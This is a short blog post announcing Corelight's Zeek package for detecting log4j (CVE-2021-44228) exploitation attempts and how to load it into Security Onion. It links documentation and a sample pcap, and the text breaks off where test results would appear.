Corelight has developed a Zeek package to detect log4j exploitation attempts:
https://github.com/corelight/cve-2021-44228
This package contains Zeek scripts which can easily be loaded into your Security Onion deployment. We've documented this process here:
https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j
After following this process, we ran so-import-pcap on the log4j pcap from https://www.malware-traffic-analysis.net/2021/12/14/index.html:
No comments:
Post a Comment